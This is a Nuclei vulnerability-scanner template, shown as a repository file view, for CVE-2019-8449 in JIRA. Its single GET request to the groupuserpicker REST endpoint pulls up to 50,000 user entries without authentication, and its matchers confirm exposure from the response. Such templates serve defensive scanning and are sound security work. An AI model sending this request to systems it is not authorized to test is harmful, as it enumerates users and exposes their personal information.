nuclei-templates/cves/CVE-2019-8449.yaml

23 lines
487 B
YAML
Raw Normal View History

id: CVE-2019-8449
info:
name: JIRA Unauthenticated Sensitive Information Disclosure
author: Harsh Bothra
severity: medium
# source:- https://www.doyler.net/security-not-included/more-jira-enumeration
requests:
- method: GET
path:
- '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true'
2020-06-30 10:43:35 +00:00
matchers:
- type: status
status:
- 200
- type: word
words:
- "users"
part: body